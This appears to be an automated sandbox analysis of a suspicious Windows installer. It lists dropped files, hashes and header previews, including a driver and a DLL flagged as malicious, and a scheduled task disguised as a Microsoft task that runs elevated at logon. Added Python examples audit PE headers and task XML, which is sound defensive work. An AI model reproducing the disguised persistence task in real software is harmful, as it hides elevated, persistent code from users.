                          SSDEEP:49152:L4y/Tn+PJNe+AYibuF2Bpvk4cyp5InIRuqqA+hT6/sr:L4yr+P+YibuF2BVzlDISu6Xg
                          MD5:FFB10CEC4DE3B1A0A939EC3BE8E6F8B5
                          SHA1:A7FBE0DA858C732AEC1CA0E1E7A056D757B7D987
                          SHA-256:C769FE62ED2DC3B729A52D1F7D6287C0C7638ED0E43CEA3A346F05CFD3CE97B2
                          SHA-512:698C83F542F2C530DB59CF65443688927AF0862E482A47B13BD1F32E134C2E76B4502DDAE3F9DC593077AAC6A87E999343513D13B2F559B296BE5593F71E5BCC
                          Malicious:false
                          Preview:7z..'...<.cZPe......@.......1..5bl.U..V...&'....3..!I.cm..BA....T.....K....t&.L.5..6....$i%+)...........2B&...+....s8..n^.{}=..*.I.E.lA.y.^...w!..1.1..J.&...B'.LA,.......v0.7.L%....6^.w...f..g.)/0.....k....z.H3...g.......B'.3#......@...cJ.4.>....g.;...~2.Nz....i.'a.h.....>.\bM....<.....2'...U...+OwN...D.....B.4.*..`..=U...u......~..............#.....CW.2......,..*.Y..3(...A=ci..W...*.7.P?.a........_raS=_]ZA0L,.....L.....a#....c......5...M.".3...f.....%...@....#i....1$1....~K.r..O......<|..^%";}....;.?)...N.Q.k?'...^.y.H^..66!..LC9.......V6....."K...D..5A.=...Q,c*.g.K.3.c.u...BBO..._.rp..].A.)\LA.2..X.A..l./.I..L,....q.3D0.Z&..Z.F.4...2P.K;...8...=..x.....{....1.........wVB%.C8.m.9..*f......c....x....:.S.48........$;B..:.a.....vs..o.....B..xh......n...C...yw..........C..-....+../..QkW.*.>-....x.....]!.*H../.f.+.+._eB.....0J...x...c'..L..:...q.....a~".#B.sz(.`..>.B#...]...F.Ck..3..B.N.....=F..r..a...v.I....8L.\.77.x.E....Mi...&M*....
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
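The record above is the one dropped PE that the listing types as "PE32+ executable (native) x86-64" and whose section table carries an INIT section: the native subsystem (IMAGE_SUBSYSTEM_NATIVE, value 1) is how a kernel-mode driver presents, and INIT is the discardable section the Windows driver build puts DriverEntry into. The following is an added example, not part of the report or of any tool it names; it parses just enough of the PE headers to make that call on a constructed header-only fixture (the fixture reuses the section names visible in the preview, is not a loadable binary, and the `build_min_pe` helper and its constants are this example's own).

```python
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_SUBSYSTEM_NATIVE = 1
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
SUBSYSTEM_NAMES = {1: "native", 2: "windows_gui", 3: "windows_cui"}


def classify_pe(data: bytes) -> dict:
    """Read the COFF and optional headers and the section names; flag the
    native-subsystem + INIT-section combination that marks a driver."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20  # COFF file header is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    # Subsystem is at offset 68 of the optional header for both PE32 and PE32+.
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    sec_table = opt + opt_size
    sections = []
    for i in range(nsections):
        raw = data[sec_table + 40 * i: sec_table + 40 * i + 8]
        sections.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return {
        "pe32plus": magic == 0x20B,
        "machine_x64": machine == IMAGE_FILE_MACHINE_AMD64,
        "subsystem": SUBSYSTEM_NAMES.get(subsystem, f"unknown({subsystem})"),
        "sections": sections,
        "looks_like_driver": subsystem == IMAGE_SUBSYSTEM_NATIVE and "INIT" in sections,
    }


def build_min_pe(subsystem: int, section_names) -> bytes:
    """Constructed fixture: DOS stub, PE signature, COFF header, PE32+
    optional header and bare section headers. Headers only, nothing runs."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew -> right after DOS header
    opt_size = 240                                   # PE32+ optional header incl. 16 data dirs
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, len(section_names),
                       0, 0, 0, opt_size, 0x22)      # Characteristics: EXECUTABLE | LARGE_ADDRESS_AWARE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    struct.pack_into("<H", opt, 68, subsystem)
    secs = b"".join(name.encode("ascii").ljust(8, b"\0") + bytes(32) for name in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs


# Section names as they appear in the dropped file's preview above, and a
# user-mode console layout for contrast.
DRIVER_LIKE = build_min_pe(IMAGE_SUBSYSTEM_NATIVE,
                           [".text", ".rdata", ".data", ".pdata", "INIT", ".rsrc", ".reloc"])
CONSOLE_LIKE = build_min_pe(IMAGE_SUBSYSTEM_WINDOWS_CUI,
                            [".text", ".rdata", ".data", ".pdata", ".rsrc"])

if __name__ == "__main__":
    print(classify_pe(DRIVER_LIKE))
    print(classify_pe(CONSOLE_LIKE))
```

On a real sample the next checks are the import table (a driver imports from ntoskrnl.exe or hal.dll rather than kernel32.dll) and the Authenticode signature, since a driver dropped by an installer into a user's profile only loads if it carries a signature the kernel will accept or is fed to a loader that bypasses that check.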
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3449406240731085
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                          MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                          SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                          SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                          SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
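The preview above (the `. ` sequences stand for line breaks in the original XML) is a Task Scheduler definition the installer dropped: URI `\kafanbbs`, Author "Microsoft Corporation", a registration date of 2005, a LogonTrigger for the current user, RunLevel HighestAvailable, and settings that keep the task alive on battery and catch up missed runs; the preview is cut off at `<RunOnlyIfNetworkAv`. The following is an added example, not part of the report or of any tool it names: a small audit of a task XML that flags exactly those properties. Its sample input is constructed from the fields visible above, with the truncated tail closed out and an `Actions` element added by this example (both assumptions, since the report does not show them), plus a second constructed task with the same author but a URI under `\Microsoft\` for contrast.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def audit_task_xml(xml_text: str) -> list:
    """Return human-readable findings for a scheduled-task definition."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    findings = []
    author = text("t:RegistrationInfo/t:Author")
    uri = text("t:RegistrationInfo/t:URI")
    # Inbox Microsoft tasks live under \Microsoft\...; a Microsoft author on a
    # task registered at the root of the library is a copy-pasted template.
    if author == "Microsoft Corporation" and uri and not uri.startswith("\\Microsoft\\"):
        findings.append(f"author claims Microsoft but URI {uri} is outside \\Microsoft\\")
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append("LogonTrigger: runs at every sign-in")
    if text("t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        findings.append("RunLevel HighestAvailable: elevated when the user is a local admin")
    if text("t:Settings/t:StartWhenAvailable") == "true":
        findings.append("StartWhenAvailable true: missed runs are caught up")
    if text("t:Settings/t:AllowHardTerminate") == "false":
        findings.append("AllowHardTerminate false: the scheduler will not force-stop it")
    if text("t:Settings/t:StopIfGoingOnBatteries") == "false":
        findings.append("StopIfGoingOnBatteries false: keeps running unplugged")
    return findings


# Constructed from the visible preview; everything after StartWhenAvailable,
# including the Actions element, is this example's assumption.
DROPPED_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2005-10-11T13:21:17-08:00</Date>
    <Author>Microsoft Corporation</Author>
    <Version>1.0.0</Version>
    <Description>Microsoft</Description>
    <URI>\kafanbbs</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled><UserId>user</UserId></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="System"><UserId>user</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="System">
    <Exec><Command>C:\Example\placeholder.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed contrast case: same author, but a library path under \Microsoft\
# and the settings a scheduled maintenance task usually carries.
INBOX_LIKE_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Microsoft Corporation</Author>
    <URI>\Microsoft\Windows\ExampleMaintenance\Daily</URI>
  </RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
  </Settings>
</Task>"""

if __name__ == "__main__":
    for line in audit_task_xml(DROPPED_TASK):
        print("-", line)
```

On a live host the same checks apply to the XML that `schtasks /Query /XML /TN <name>` returns, or to the task files under `C:\Windows\System32\Tasks`; the URI, author and RunLevel fields are where a cloned Microsoft template gives itself away.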
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1676465
                          Entropy (8bit):7.9998930894979035
                          Encrypted:true
                          SSDEEP:24576:CgXC6MkmDNAh7Oh81cHWpSFrTRHzvGo9Tw9LvT0wizEvy1vbNtWwAmPC7pkW2A+v:CT6jmDygh8KWpSF9z9TwVL0w5y1Lb+4v
                          MD5:6ED5E5FC8671A4CF1FBC61D9434C67D8
                          SHA1:7BED7036264A0794C60D766B0B79860838917BF6
                          SHA-256:480A033FF4FCC9E64D48ED456E9162E05979F9ECF988CDF1DAB29E001F73D6B7
                          SHA-512:EB3BBD792491F152510492291784C8622D852C354487B5095F72DF94B89E68602E7CC9DCF7F03230EE8918D20E849BA7671F328BC924AB65FE7EFF44321289D4
                          Malicious:false
                          Preview:.8*...z....L.gG..Q@=...c...yj..ENkkT.2[.[e...n.[..0@.T..[.:Ru8....N~...{x.5".g.n...x.5`...x5.....;O...BCN......W.."...C}.i'.....u.j.b.m..J.kX2...91.t...kp.Ns...Ew.0S....'.e9\I..E.5;6UN..:...2.... ouL.y..M...S...mh........h.#;&.a.....=..7.......|#1.4~V;..|..E..{...Y..v......l6u*r..+.....y.HY.w..\[..4..~T.`..r......bh..".-..(......7M@...1.....zd%.9.7.....vMc.-.s`...*...D...M...U..".....3.4&.T..mU ..,.i1.L.z8wn...FQ@b@.P+....]x..v../..c........`.V...=...'.8.M._..Q~.5vj...^..J.o.9....C................k@...T..I..&.m..xh.......GV...81.X....~.X..%I6......Vy.....Q.l%~..]d..g]"...>.^..G.x.%....Q...Mu.B....E....-...4.3X.5.9%B.N.......R0f.W>.i.w.|.F....D...*s.y....4b...>.....R.D.Y.#H=..G..N).X7l.p.NV.......,.._m....nhub.-...5.3?....|.$..d...^.B..0Z.O..xUH.... .b..?.........b.M...R.<W`.K..9BR..4]X&.........>.!.~...Z.d;.2L..!aT.2.".4 .cd.,...G...ksQ.`.&................vu....z.|gSa.U...}.....:.c.....=..i.RE..I..ae.9.i.0d.._.......a.<.c.hS.pX..D.SD
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulFgtj:NllUa
                          MD5:E986DDCA20E18C878305AA21342325F6
                          SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
                          SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
                          SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
                          Malicious:false
                          Preview:@...e................................................@..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606016
                          Entropy (8bit):7.0063494494702985
                          Encrypted:false
                          SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                          MD5:95ACD5631A9131DB1FD066565AFC9A67
                          SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                          SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                          SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 24%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530563595191976
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:6A58BEB829BD96D5574E24C76DD36FD9
                          SHA1:BE041E04908055F3CAC715ADCC9C0BB13227CCE9
                          SHA-256:2123EE41F3BE09DBC56B39DC3F6DEC504086C6AB38AC62797F1C00EB7CAF9C5B
                          SHA-512:B5C68FC8BD472470763A0C4AF6BA5FB7D27B285D48F697161688AC32B26B9E764B477F53D25F3FE3C7D7FF79466BAAC87A294A106CE7E2C646389E7B1760A534
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530563595191976
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:6A58BEB829BD96D5574E24C76DD36FD9
                          SHA1:BE041E04908055F3CAC715ADCC9C0BB13227CCE9
                          SHA-256:2123EE41F3BE09DBC56B39DC3F6DEC504086C6AB38AC62797F1C00EB7CAF9C5B
                          SHA-512:B5C68FC8BD472470763A0C4AF6BA5FB7D27B285D48F697161688AC32B26B9E764B477F53D25F3FE3C7D7FF79466BAAC87A294A106CE7E2C646389E7B1760A534
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606016
                          Entropy (8bit):7.0063494494702985
                          Encrypted:false
                          SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                          MD5:95ACD5631A9131DB1FD066565AFC9A67
                          SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                          SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                          SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 24%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946151144235558
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          File size:7'238'486 bytes
                          MD5:d81e3f29d547be83a40d0ace4bd86985
                          SHA1:623922ffc12a8b5c69215d133b23c4eb75cb5979
                          SHA256:a6c25c845a00c651e6f35751ca141e18f4065492d9f3720056b5184a2030301e
                          SHA512:60eb429308f0f39c7bb351936fbe3da0fd424cc5f6ca9bdcbef0b793ab3617f06ac63f9bdc7b2b4d000f17945d9953214c04036703576850c772ad8e7e211e95
                          SSDEEP:98304:XwRERKdk0tGkmWu7m6cmsIm8CWj9TwqwNnVjCMUMzeV+hYOBuDXwtWf2dMwZgS:lAB0NWu7TcmLmMp8NngEyV+mguDXbk/
                          TLSH:D5761223F2CBD13DF45A0B3716B2A15494FBAA216422AE5796ECB4ECCF311501E3E617
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                          Icon Hash:0c0c2d33ceec80aa
                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
                          Instruction
                          push ebp
